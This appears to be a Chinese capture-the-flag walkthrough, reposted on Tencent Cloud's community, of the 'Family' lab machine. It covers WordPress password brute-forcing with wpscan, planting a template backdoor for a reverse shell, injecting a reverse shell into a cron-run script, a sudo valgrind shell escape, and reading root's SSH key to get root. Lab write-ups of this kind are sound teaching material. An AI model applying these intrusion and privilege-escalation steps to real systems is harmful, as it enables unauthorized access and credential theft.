前往小程序,Get更优阅读体验!
立即前往
文档建议反馈控制台
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
发布
首页
学习
活动
专区
工具
TVP最新优惠活动
返回腾讯云官网
社区首页 >专栏 >记一次对Family靶机的渗透测试

记一次对Family靶机的渗透测试

作者头像
亿人安全
发布2022-06-30 16:00:26
2960
发布2022-06-30 16:00:26
举报
文章被收录于专栏:红蓝对抗

靶机信息

代码语言:javascript
复制
靶机地址:https://hackmyvm.eu/machines/machine.php?vm=Family

名称:(家庭)

难度:中等

创作者:cromiphi

发布日期:2021-04-30

目标:user.txt和falg.txt,root权限

搭建靶机

下载完Family.ova后,使用Oracle VM VirtualBox导入即可

导入时注意!!不要勾上USB控制器,不然会出错

导入完成后,直接启动即可,就可以开始靶机之旅

实验环境

代码语言:javascript
复制
攻击机:VMware      Kali    192.168.31.185
目标机:VirtualBox  Debian  IP自动获取

信息收集

扫描局域网内的靶机IP地址

代码语言:javascript
复制
nmap -sn 192.168.31.0/24

端口扫描,扫描目标机器所开放的服务

代码语言:javascript
复制
nmap -A -p- 192.168.31.214

扫描到22(SSH)、80(HTTP)两个端口,使用火狐浏览器访问80端口,http://192.168.2.214

是个wordpress,继续访问http://192.168.31.214/wordpress/,右击查看源码

本机加个family的hosts再继续访问

目录扫描,扫描一些敏感文件之类的,使用gobuster来扫描

代码语言:javascript
复制
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r -u http://family/wordpress/ -x html,php,txt -t 150

渗透测试

使用 wpscan 扫描 wordpress,没有发现可用的

代码语言:javascript
复制
wpscan --url http://family/wordpress/

使用 wpscan来爆破用户名

代码语言:javascript
复制
wpscan --url http://family/wordpress/ --enumerate u

发现一个admin

使用 wpscan来爆破admin用户的密码

代码语言:javascript
复制
wpscan --url http://family/wordpress/ -P /usr/share/wordlists/rockyou.txt -U admin

访问http://family/wordpress/wp-login.php,输入账号密码,登录后台

通过修改模板写入后门,访问文件即可获取反弹shell

访问404页面http://family/wordpress/wp-content/themes/twentytwentyone/404.php

新开一个终端页面开启监听

代码语言:javascript
复制
nc -lvnp 6666

检查home,发现有3个用户

继续寻找一些有用的资源,发现了father用户的密码

新开一个终端页面来登录father用户

代码语言:javascript
复制
ssh father@192.168.31.214
id
cd /home
ls -al

发现/home/mother 属于组father

上传pspy64来查看进程

代码语言:javascript
复制
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
chmod +x pspy64
./pspy64

发现/bin/sh -c python ~/check.py每一分钟就执行一次

这样就可以在 /home/mother/check.py 中编写一些反向shell代码,等一分钟后就可以得到mother用户的反向shell

新开一个终端页面开启监听

代码语言:javascript
复制
nc -lvnp 5555

检查用户mother用户的权限,发现可以以用户baby运行二进制valgrind

代码语言:javascript
复制
sudo -l

执行以下命令,得到baby用户的shell

代码语言:javascript
复制
sudo -u baby valgrind /bin/bash
/bin/bash -i

拿到user.txt的flag

再次检查baby用户的权限

代码语言:javascript
复制
sudo -l

查看root的ssh密钥

代码语言:javascript
复制
sudo cat /root/.ssh/id_rsa

将ssh密钥保存下来,通过ssh密钥来提权

新开一个终端页面来登录root

代码语言:javascript
复制
chmod 600 id_rsa
ssh -i id_rsa root@192.168.31.214

发现一登录就会退出,因为 /root/.ssh/authorized_keys 执行 /root/troll.sh,它就会立即退出

现在要使shell代码不退出,需要将终端尺寸变小,使“more”无法显示全部信息再通过!/bin/bash来转义

代码语言:javascript
复制
ssh -i id_rsa root@192.168.31.214
!/bin/bash

成功获取到root权限,拿到flag

代码语言:javascript
复制
声明:请勿用作违法用途,请在授权情况下使用
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2022-02-23,如有侵权请联系 cloudcommunity@tencent.com 删除
wordpress
shell
网站建设
ssh
http

本文分享自 亿人安全 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

wordpress
shell
网站建设
ssh
http
评论
登录后参与评论
0 条评论
热度
最新
登录 后参与评论
推荐阅读
LV.
文章
0
获赞
0
目录
  • 靶机信息
  • 搭建靶机
  • 实验环境
  • 信息收集
  • 渗透测试
相关产品与服务
网站建设
网站建设(Website Design Service,WDS),是帮助您快速搭建企业网站的服务。通过自助模板建站工具及专业设计服务,无需了解代码技术,即可自由拖拽模块,可视化完成网站管理。全功能管理后台操作方便,一次更新,数据多端同步,省时省心。使用网站建设服务,您无需维持技术和设计师团队,即可快速实现网站上线,达到企业数字化转型的目的。
产品介绍产品文档
领券

腾讯云开发者

扫码关注腾讯云开发者

扫码关注腾讯云开发者

领取腾讯云代金券

热门产品

热门推荐

更多推荐

Copyright © 2013 - 2024 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有 

深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569

腾讯云计算(北京)有限责任公司 京ICP证150476号 |  京ICP备11018762号 | 京公网安备号11010802020287

问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档

Copyright © 2013 - 2024 Tencent Cloud.

All Rights Reserved. 腾讯云 版权所有

登录 后参与评论